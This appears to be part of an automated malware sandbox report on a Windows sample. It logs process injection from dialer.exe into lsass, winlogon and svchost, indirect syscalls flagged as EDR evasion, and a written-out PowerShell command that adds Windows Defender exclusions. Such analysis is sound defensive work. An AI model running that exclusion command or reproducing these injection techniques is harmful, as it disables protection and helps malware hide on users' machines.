                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000001B0BB987D90
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26F7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000216D26F7D90
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26FD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000216D26FD2A4
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00000150E93ED2A4
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00000150E93E7D90
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00000267FCE97D90
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE9D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00000267FCE9D2A4
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B52D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_000002359B52D2A4
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B527D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_000002359B527D90
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_00000225DC647D90
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC64D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_00000225DC64D2A4
                                Source: C:\PerfDll\hyperProviderSavesinto.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Adds a directory exclusion to Windows Defender
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                                Allocates memory in foreign processes
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAF190000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Recovery\RuntimeBroker.exe base: 1300000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B5644B0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2108BCE0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29166940000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19E29CE0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: C350000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22399A10000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BFFC960000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FBA3250000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1D4C2220000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1F2989C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 25EEFAE0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23839DB0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 17644530000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B42C420000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BCF4530000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1B0BB950000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 216D26C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 1E7C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 2D90000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Recovery\WmiPrvSE.exe base: 1B4E0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Recovery\WmiPrvSE.exe base: 13C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 150E9040000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 267FCE60000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\PING.EXE base: 2359B4F0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Recovery\RuntimeBroker.exe base: 1BD70000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Recovery\RuntimeBroker.exe base: 1360000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: BB0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: E60000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 289066A0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E205C10000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E2066A0000 protect: page execute and read and write
                                Contains functionality to inject code into remote processes
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,46_2_0000000140001C88
                                Creates a thread in another existing process (thread injection)
                                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C0AB273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 612D273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AF19273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8799273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5377273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D53273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 67D273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5B38273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EBFD273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5904273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9E7273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7316273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 130273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4E86273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 473C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6F9D273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 83BC273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D3F7273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A415273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BDF3273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C026273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C9F3273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 644B273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B2A273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4F6273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2AB4273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ADB273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25DA273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F535273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F0D6273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FFB273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C257273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8BCE273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6694273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13EF273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D57273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 69B4273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC74273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5DA7273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199D273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F389273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3B8273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E4273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A653273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 29CE273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B15273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 621A273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F48273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B4B273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683D273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C35273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2E26273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6C5E273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D593273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC69273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7897273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B4273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D0A273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB4C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2A64273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CF3273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 641A273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4935273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60D8273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E7B273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F7C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E815273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5234273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DA9273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 99A1273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC96273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A325273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C222273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 989C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EFAE273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 39DB273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4453273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2C42273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F453273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BB95273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D26C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1E7C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2D9273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E904273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FCE6273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9B4F273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1BD7273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 136273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BB273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E6273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66A273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5C1273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66A273C
                                Found direct / indirect Syscall (likely to bypass EDR)
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtEnumerateValueKey: Indirect: 0x2DC293D
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtEnumerateValueKey: Indirect: 0x2DC290E
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtQuerySystemInformation: Indirect: 0x1ED3205D
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtEnumerateValueKey: Indirect: 0x1ED3290E
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtDeviceIoControlFile: Indirect: 0x1ED32B9D
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtEnumerateValueKey: Indirect: 0x1ED3293D
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtQuerySystemInformation: Indirect: 0x1ED32F57
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtResumeThread: Indirect: 0x1ED3231E
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtEnumerateKey: Indirect: 0x1ED32842
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtEnumerateKey: Indirect: 0x1ED32875
                                Injects a PE file into a foreign processes
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF190000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\RuntimeBroker.exe base: 1300000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
